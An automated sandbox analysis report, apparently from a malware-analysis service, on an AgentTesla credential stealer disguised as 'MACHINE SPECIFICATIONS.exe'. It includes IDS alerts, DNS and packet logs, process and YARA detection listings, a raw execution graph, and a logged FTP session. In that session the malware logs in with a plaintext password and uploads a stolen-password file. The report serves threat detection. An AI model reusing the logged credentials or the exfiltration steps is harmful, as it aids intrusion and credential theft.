                                                              RT_MANIFEST0x81eb40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              192.168.2.351.195.62.16049702212029927 11/29/22-11:20:12.397759TCP2029927ET TROJAN AgentTesla Exfil via FTP4970221192.168.2.351.195.62.160
                                                              192.168.2.351.195.62.16049703522592851779 11/29/22-11:20:12.420526TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4970352259192.168.2.351.195.62.160
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 29, 2022 11:19:53.759691000 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:19:53.759767056 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:53.759933949 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:19:53.807363987 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:19:53.807424068 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:54.121747017 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:54.122018099 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:19:54.132211924 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:19:54.132246971 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:54.132662058 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:54.338932991 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:54.339055061 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:19:54.616307974 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:19:54.616383076 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:54.763174057 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:54.763329983 CET443497013.220.57.224192.168.2.3
                                                              Nov 29, 2022 11:19:54.763463974 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:19:54.767330885 CET49701443192.168.2.33.220.57.224
                                                              Nov 29, 2022 11:20:12.212491989 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.231043100 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.231232882 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.250191927 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.250646114 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.269145012 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.269206047 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.269444942 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.296277046 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.296541929 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.314970016 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.315330029 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.333745003 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.334007978 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.352402925 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.354644060 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.373279095 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.378772974 CET4970352259192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.397347927 CET522594970351.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.397562027 CET4970352259192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.397758961 CET4970221192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.416052103 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.420526028 CET4970352259192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.420638084 CET4970352259192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.438709974 CET522594970351.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.438776970 CET522594970351.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.438832998 CET214970251.195.62.160192.168.2.3
                                                              Nov 29, 2022 11:20:12.438872099 CET4970352259192.168.2.351.195.62.160
                                                              Nov 29, 2022 11:20:12.438963890 CET4970221192.168.2.351.195.62.160
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 29, 2022 11:19:53.677805901 CET5799053192.168.2.38.8.8.8
                                                              Nov 29, 2022 11:19:53.695560932 CET53579908.8.8.8192.168.2.3
                                                              Nov 29, 2022 11:19:53.711530924 CET5238753192.168.2.38.8.8.8
                                                              Nov 29, 2022 11:19:53.730598927 CET53523878.8.8.8192.168.2.3
                                                              Nov 29, 2022 11:20:12.084580898 CET5692453192.168.2.38.8.8.8
                                                              Nov 29, 2022 11:20:12.209414005 CET53569248.8.8.8192.168.2.3
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 29, 2022 11:19:53.677805901 CET192.168.2.38.8.8.80xfd66Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.711530924 CET192.168.2.38.8.8.80x6f4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:20:12.084580898 CET192.168.2.38.8.8.80xa066Standard query (0)ftp.electrobist.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 29, 2022 11:18:50.334419966 CET8.8.8.8192.168.2.30xd9b5No error (0)au.c-0001.c-msedge.netc-0001.c-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Nov 29, 2022 11:18:50.334419966 CET8.8.8.8192.168.2.30xd9b5No error (0)c-0001.c-msedge.net13.107.4.50A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                              Nov 29, 2022 11:20:12.209414005 CET8.8.8.8192.168.2.30xa066No error (0)ftp.electrobist.com51.195.62.160A (IP address)IN (0x0001)false
                                                              • api.ipify.org
                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.3497013.220.57.224443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2022-11-29 10:19:54 UTC0OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                              Host: api.ipify.org
                                                              Connection: Keep-Alive
                                                              2022-11-29 10:19:54 UTC0INHTTP/1.1 200 OK
                                                              Server: Cowboy
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Vary: Origin
                                                              Date: Tue, 29 Nov 2022 10:19:54 GMT
                                                              Content-Length: 14
                                                              Via: 1.1 vegur
                                                              2022-11-29 10:19:54 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39
                                                              Data Ascii: 102.129.143.49


                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                              Nov 29, 2022 11:20:12.250191927 CET214970251.195.62.160192.168.2.3220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                              Nov 29, 2022 11:20:12.250646114 CET4970221192.168.2.351.195.62.160USER user1@electrobist.com
                                                              Nov 29, 2022 11:20:12.269206047 CET214970251.195.62.160192.168.2.3331 User user1@electrobist.com OK. Password required
                                                              Nov 29, 2022 11:20:12.269444942 CET4970221192.168.2.351.195.62.160PASS w&oNc9e]pf~4
                                                              Nov 29, 2022 11:20:12.296277046 CET214970251.195.62.160192.168.2.3230 OK. Current restricted directory is /
                                                              Nov 29, 2022 11:20:12.314970016 CET214970251.195.62.160192.168.2.3504 Unknown command
                                                              Nov 29, 2022 11:20:12.315330029 CET4970221192.168.2.351.195.62.160PWD
                                                              Nov 29, 2022 11:20:12.333745003 CET214970251.195.62.160192.168.2.3257 "/" is your current location
                                                              Nov 29, 2022 11:20:12.334007978 CET4970221192.168.2.351.195.62.160TYPE I
                                                              Nov 29, 2022 11:20:12.352402925 CET214970251.195.62.160192.168.2.3200 TYPE is now 8-bit binary
                                                              Nov 29, 2022 11:20:12.354644060 CET4970221192.168.2.351.195.62.160PASV
                                                              Nov 29, 2022 11:20:12.373279095 CET214970251.195.62.160192.168.2.3227 Entering Passive Mode (51,195,62,160,204,35)
                                                              Nov 29, 2022 11:20:12.397758961 CET4970221192.168.2.351.195.62.160STOR PW_user-965543_2022_11_29_11_20_10.html
                                                              Nov 29, 2022 11:20:12.416052103 CET214970251.195.62.160192.168.2.3150 Accepted data connection
                                                              Nov 29, 2022 11:20:12.438832998 CET214970251.195.62.160192.168.2.3226-File successfully transferred
                                                              226-File successfully transferred226 0.023 seconds (measured here), 19.62 Kbytes per second

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:11:18:56
                                                              Start date:29/11/2022
                                                              Path:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                              Imagebase:0x19218000000
                                                              File size:523776 bytes
                                                              MD5 hash:92945D0A2731EF771EA9D10C792E03E1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              Target ID:10
                                                              Start time:11:19:46
                                                              Start date:29/11/2022
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                              Imagebase:0x10000
                                                              File size:107624 bytes
                                                              MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate

                                                              Target ID:11
                                                              Start time:11:20:05
                                                              Start date:29/11/2022
                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                              Imagebase:0x800000
                                                              File size:107624 bytes
                                                              MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:.Net C# or VB.NET
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              Reputation:moderate

                                                              Target ID:12
                                                              Start time:11:20:05
                                                              Start date:29/11/2022
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff745070000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:13
                                                              Start time:11:20:13
                                                              Start date:29/11/2022
                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                              Imagebase:0x490000
                                                              File size:107624 bytes
                                                              MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:moderate

                                                              Target ID:14
                                                              Start time:11:20:14
                                                              Start date:29/11/2022
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff745070000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:16%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:4.2%
                                                                Total number of Nodes:407
                                                                Total number of Limit Nodes:50
                                                                execution_graph 47401 5eee07b 47404 5eec054 47401->47404 47403 5eee087 47405 5eec05f 47404->47405 47407 5eee11b 47405->47407 47408 5eebf2c 47405->47408 47409 5eecdb0 GetModuleHandleW 47408->47409 47411 5eece25 47409->47411 47411->47407 47421 23fb998 47422 23fb9b6 47421->47422 47425 23fa9a0 47422->47425 47424 23fb9ed 47426 23fd4b8 LoadLibraryA 47425->47426 47428 23fd594 47426->47428 47802 23f0448 47803 23f0455 47802->47803 47807 23f086a 47803->47807 47815 23f0878 47803->47815 47804 23f045b 47812 23f0873 47807->47812 47809 23f0a76 VirtualAllocExNuma 47811 23f0b45 47809->47811 47811->47804 47812->47809 47814 23f08ab 47812->47814 47823 23f042c 47812->47823 47827 23f0554 47812->47827 47814->47804 47818 23f0895 47815->47818 47816 23f042c Sleep 47816->47818 47817 23f0a76 VirtualAllocExNuma 47820 23f0b45 47817->47820 47818->47816 47818->47817 47821 23f0554 VirtualAllocExNuma 47818->47821 47822 23f08ab 47818->47822 47820->47804 47821->47818 47822->47804 47824 23f0b80 Sleep 47823->47824 47826 23f0bee 47824->47826 47826->47812 47828 23f0ac8 VirtualAllocExNuma 47827->47828 47830 23f0b45 47828->47830 47830->47812 47525 5ee9054 47527 5ee905e 47525->47527 47526 5ee9087 47527->47526 47535 5ee94fc 47527->47535 47553 5ee94b0 47527->47553 47574 5ee94a0 47527->47574 47596 5ee9544 47527->47596 47611 5ee9594 47527->47611 47623 5ee9598 47527->47623 47635 5ee94ac 47527->47635 47536 5ee950e 47535->47536 47537 5ee9531 47535->47537 47536->47526 47538 5ee9544 5 API calls 47537->47538 47539 5ee953f 47538->47539 47540 5ee9559 47539->47540 47541 5ee9594 5 API calls 47539->47541 47540->47526 47543 5ee958f 47541->47543 47542 5ee988c 47542->47526 47543->47542 47544 5eea904 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47543->47544 47545 5eea970 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47543->47545 47551 5eea97c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47543->47551 47552 5eea908 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47543->47552 47656 5ee9954 47543->47656 47671 5ee99a4 47543->47671 47683 5ee99f4 47543->47683 47688 5ee9a48 47543->47688 47691 5ee9904 47543->47691 47544->47543 47545->47543 47551->47543 47552->47543 47554 5ee94e4 47553->47554 47555 5ee94c1 47553->47555 47556 5ee94fc 5 API calls 47554->47556 47555->47526 47558 5ee94f7 47556->47558 47557 5ee950e 47557->47526 47558->47557 47559 5ee9544 5 API calls 47558->47559 47560 5ee953f 47559->47560 47561 5ee9559 47560->47561 47562 5ee9594 5 API calls 47560->47562 47561->47526 47564 5ee958f 47562->47564 47563 5ee988c 47563->47526 47564->47563 47565 5eea97c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47564->47565 47566 5eea908 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47564->47566 47567 5eea904 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47564->47567 47568 5eea970 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47564->47568 47569 5ee9a48 5 API calls 47564->47569 47570 5ee99f4 5 API calls 47564->47570 47571 5ee99a4 5 API calls 47564->47571 47572 5ee9954 5 API calls 47564->47572 47573 5ee9904 5 API calls 47564->47573 47565->47564 47566->47564 47567->47564 47568->47564 47569->47564 47570->47564 47571->47564 47572->47564 47573->47564 47575 5ee94ac 5 API calls 47574->47575 47577 5ee94a7 47575->47577 47576 5ee94c1 47576->47526 47577->47576 47578 5ee94fc 5 API calls 47577->47578 47580 5ee94f7 47578->47580 47579 5ee950e 47579->47526 47580->47579 47581 5ee9544 5 API calls 47580->47581 47582 5ee953f 47581->47582 47583 5ee9559 47582->47583 47584 5ee9594 5 API calls 47582->47584 47583->47526 47586 5ee958f 47584->47586 47585 5ee988c 47585->47526 47586->47585 47587 5eea97c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47586->47587 47588 5eea908 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47586->47588 47589 5eea904 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47586->47589 47590 5eea970 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47586->47590 47591 5ee9a48 5 API calls 47586->47591 47592 5ee99f4 5 API calls 47586->47592 47593 5ee99a4 5 API calls 47586->47593 47594 5ee9954 5 API calls 47586->47594 47595 5ee9904 5 API calls 47586->47595 47587->47586 47588->47586 47589->47586 47590->47586 47591->47586 47592->47586 47593->47586 47594->47586 47595->47586 47597 5ee957c 47596->47597 47598 5ee9559 47596->47598 47599 5ee9594 5 API calls 47597->47599 47598->47526 47601 5ee958f 47599->47601 47600 5ee988c 47600->47526 47601->47600 47602 5eea97c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47601->47602 47603 5eea908 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47601->47603 47604 5eea904 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47601->47604 47605 5eea970 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47601->47605 47606 5ee9a48 5 API calls 47601->47606 47607 5ee99f4 5 API calls 47601->47607 47608 5ee99a4 5 API calls 47601->47608 47609 5ee9954 5 API calls 47601->47609 47610 5ee9904 5 API calls 47601->47610 47602->47601 47603->47601 47604->47601 47605->47601 47606->47601 47607->47601 47608->47601 47609->47601 47610->47601 47612 5ee95ad 47611->47612 47613 5ee988c 47612->47613 47614 5eea97c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47612->47614 47615 5eea908 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47612->47615 47616 5eea904 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47612->47616 47617 5eea970 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47612->47617 47618 5ee9a48 5 API calls 47612->47618 47619 5ee99f4 5 API calls 47612->47619 47620 5ee99a4 5 API calls 47612->47620 47621 5ee9954 5 API calls 47612->47621 47622 5ee9904 5 API calls 47612->47622 47613->47526 47614->47612 47615->47612 47616->47612 47617->47612 47618->47612 47619->47612 47620->47612 47621->47612 47622->47612 47624 5ee95ad 47623->47624 47625 5ee988c 47624->47625 47626 5eea904 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47624->47626 47627 5eea970 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47624->47627 47628 5ee9a48 5 API calls 47624->47628 47629 5ee99f4 5 API calls 47624->47629 47630 5ee99a4 5 API calls 47624->47630 47631 5ee9954 5 API calls 47624->47631 47632 5ee9904 5 API calls 47624->47632 47633 5eea97c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47624->47633 47634 5eea908 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47624->47634 47625->47526 47626->47624 47627->47624 47628->47624 47629->47624 47630->47624 47631->47624 47632->47624 47633->47624 47634->47624 47636 5ee94e4 47635->47636 47637 5ee94c1 47635->47637 47638 5ee94fc 5 API calls 47636->47638 47637->47526 47640 5ee94f7 47638->47640 47639 5ee950e 47639->47526 47640->47639 47641 5ee9544 5 API calls 47640->47641 47642 5ee953f 47641->47642 47643 5ee9559 47642->47643 47644 5ee9594 5 API calls 47642->47644 47643->47526 47645 5ee958f 47644->47645 47646 5ee988c 47645->47646 47647 5ee9a48 5 API calls 47645->47647 47648 5ee99f4 5 API calls 47645->47648 47649 5ee99a4 5 API calls 47645->47649 47650 5ee9954 5 API calls 47645->47650 47651 5ee9904 5 API calls 47645->47651 47652 5eea97c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47645->47652 47653 5eea908 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47645->47653 47654 5eea904 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47645->47654 47655 5eea970 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 47645->47655 47646->47526 47647->47645 47648->47645 47649->47645 47650->47645 47651->47645 47652->47645 47653->47645 47654->47645 47655->47645 47662 5ee9900 47656->47662 47665 5ee994f 47656->47665 47657 5ee9969 47657->47543 47658 5ee9919 47658->47543 47659 5ee999a 47661 5ee99a4 5 API calls 47659->47661 47660 5ee99e9 47663 5ee99f4 5 API calls 47660->47663 47667 5ee999f 47661->47667 47662->47658 47664 5ee9954 5 API calls 47662->47664 47668 5ee99ef 47663->47668 47664->47665 47665->47657 47665->47659 47665->47660 47666 5ee9a09 47666->47543 47667->47543 47668->47666 47706 5ee9b10 47668->47706 47669 5ee9a6f 47669->47543 47673 5ee999f 47671->47673 47674 5ee9950 47671->47674 47672 5ee9969 47672->47543 47673->47543 47674->47672 47675 5ee999a 47674->47675 47676 5ee99e9 47674->47676 47677 5ee99a4 5 API calls 47675->47677 47678 5ee99f4 5 API calls 47676->47678 47677->47673 47680 5ee99ef 47678->47680 47679 5ee9a09 47679->47543 47680->47679 47682 5ee9b10 5 API calls 47680->47682 47681 5ee9a6f 47681->47543 47682->47681 47684 5ee9a2c 47683->47684 47685 5ee9a09 47683->47685 47687 5ee9b10 5 API calls 47684->47687 47685->47543 47686 5ee9a6f 47686->47543 47687->47686 47689 5ee9a6f 47688->47689 47690 5ee9b10 5 API calls 47688->47690 47689->47543 47690->47689 47692 5ee993c 47691->47692 47693 5ee9919 47691->47693 47694 5ee9954 5 API calls 47692->47694 47693->47543 47696 5ee994f 47694->47696 47695 5ee9969 47695->47543 47696->47695 47697 5ee999a 47696->47697 47698 5ee99e9 47696->47698 47699 5ee99a4 5 API calls 47697->47699 47700 5ee99f4 5 API calls 47698->47700 47703 5ee999f 47699->47703 47702 5ee99ef 47700->47702 47701 5ee9a09 47701->47543 47702->47701 47705 5ee9b10 5 API calls 47702->47705 47703->47543 47704 5ee9a6f 47704->47543 47705->47704 47707 5ee9b24 47706->47707 47709 5ee9b62 47706->47709 47712 5ee9b10 5 API calls 47707->47712 47708 5ee9b3a 47713 5eea904 47708->47713 47723 5eea908 47708->47723 47709->47669 47712->47708 47715 5eea908 47713->47715 47714 5eea913 47714->47709 47715->47714 47716 5eeaa2f 47715->47716 47718 5eeaa3d 47715->47718 47717 5ee9a48 5 API calls 47716->47717 47719 5eeaa36 47717->47719 47718->47719 47734 5eeae08 47718->47734 47740 5eeae04 47718->47740 47746 5eeadf7 47718->47746 47719->47709 47724 5eea913 47723->47724 47726 5eea93b 47723->47726 47724->47709 47725 5eea991 47725->47709 47726->47725 47727 5eeaa2f 47726->47727 47730 5eeaa3d 47726->47730 47728 5ee9a48 5 API calls 47727->47728 47729 5eeaa36 47728->47729 47729->47709 47730->47729 47731 5eeae08 5 API calls 47730->47731 47732 5eeadf7 5 API calls 47730->47732 47733 5eeae04 5 API calls 47730->47733 47731->47729 47732->47729 47733->47729 47735 5eeae16 47734->47735 47754 5eeaedc 47734->47754 47764 5eeae30 47734->47764 47776 5eeae40 47734->47776 47787 5eeae3c 47734->47787 47735->47719 47741 5eeae16 47740->47741 47742 5eeaedc 2 API calls 47740->47742 47743 5eeae3c 3 API calls 47740->47743 47744 5eeae40 3 API calls 47740->47744 47745 5eeae30 4 API calls 47740->47745 47741->47719 47742->47741 47743->47741 47744->47741 47745->47741 47747 5eeae04 5 API calls 47746->47747 47748 5eeadff 47747->47748 47750 5eeaedc 2 API calls 47748->47750 47751 5eeae3c 3 API calls 47748->47751 47752 5eeae40 3 API calls 47748->47752 47753 5eeae30 4 API calls 47748->47753 47749 5eeae16 47749->47719 47750->47749 